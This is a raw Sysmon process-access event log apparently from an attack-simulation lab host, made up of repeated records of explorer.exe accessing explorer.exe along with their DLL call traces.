16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244827Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244826Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244825Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244824Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244823Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244822Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244821Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244820Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244819Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244818Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244817Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244816Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244815Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244814Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244813Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244812Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244811Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244810Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244809Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6394-603E-0CA9-00000000AD01}10840C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244808Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244807Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244806Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244805Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244804Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244803Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244802Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244801Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:56:29.686{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6358-603E-03A9-00000000AD01}5868C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002244800Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 